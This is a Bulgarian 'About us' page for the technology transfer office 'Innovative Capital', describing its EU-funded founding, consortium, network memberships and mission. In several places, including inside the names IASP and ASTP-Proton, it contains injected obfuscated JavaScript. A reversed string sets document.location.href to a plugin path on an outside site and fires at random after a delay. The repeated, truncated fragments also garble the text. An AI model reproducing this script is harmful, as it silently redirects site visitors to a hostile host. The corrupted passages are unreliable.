За нас

Офис за технологичен трансфер „Иновативен капитал” е създаден през м. август 2012 г. по проект № BG161PO003-1.2.02 – 0007 – C0001 „Изграждане и функциониране на Офис за технологичен трансфер „Иновативен капитал”, финансиран по Оперативна програма  „Развитие  на  конкурентоспособността  на  българската  икономика”  2007-2013, съфинансирана от Европейския съюз чрез Европейския фонд за регионално развитие и държавния бюджет на Република България.

Офис за технологичен трансфер „Иновативен капитал” е учреден от Консорциум, който включва „ВИП Капитал” ООД, „ИНИ-Новация България” ЕООД и Сдружение с нестопанска цел „Асоциация за масови комуникации”.

Офис за технологичен трансфер „Иновативен капитал“ е член на European BIC Network (BIC). European BIC Network (BIC) е мрежа от около 150 бизнес и иновационни центрове, както и на около 100 други организации. Основната мисия на EBN е да подкрепят развитието и растежа на предприемачи, стартиращи фирми и малки и средни предприятия. EBN е и общност от професионалисти, чиято основна цел  е да  помага на техните членове, бизнесът им да расте по най-ефективен, ефикасен и устойчив начин.

Офис за технологичен трансфер „Иновативен капитал“ е член на International Association of Science Parks toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Areas of Innovation (IASP). International Association of Science Parks toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}and Areas of Innovation (IASP) е световна мрежа на научните паркове и области на иновации.  

Oфис за технологичен трансфер „Иновативен капитал“ е член на Българска мрежа за технологичен трансфер (БМТТ), която  подпомага развитието на иновативни предприятия и комерсиализацията на научните изследвания и високите технологии в България.

Oфис за технологичен трансфер „Иновативен капитал“ е член на ASTP-Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton. ASTP-Protoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.rantoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton се фокусира върху професионалистите по трансфер на знания и технологичен трансфер:

•              създаване и обмен на най-добри практики за знания;

•              трансфер на технологии и обучение на специалисти.

Мисията на ОТТ „Иновативен Капитал” е да бъде посредник в процеса на трансфер на технологии между потребители и доставчици на технологии с цел да се допринесе за скъсяване на дистанцията между научните резултати и пазара.

Визия на ОТТ „Иновативен Капитал” е да бъде широко разпознат като контактен пункт и ресурс за добавена стойност за процесите на технологичен трансфер в региона на София. ОТТ „Иновативен Капитал“ насърчава комерсиализацията на иновациите и научните резултати и тяхното пазарно разработване като подобрени или нови продукти, услуги, или спин оф компании, повишаващи конкурентноспособността.

Стратегическата цел на ОТТ „Иновативен Капитал“ е да бъде основен инструмент   и представител на трансфера на технологии между частния, публичния и академичния сектор.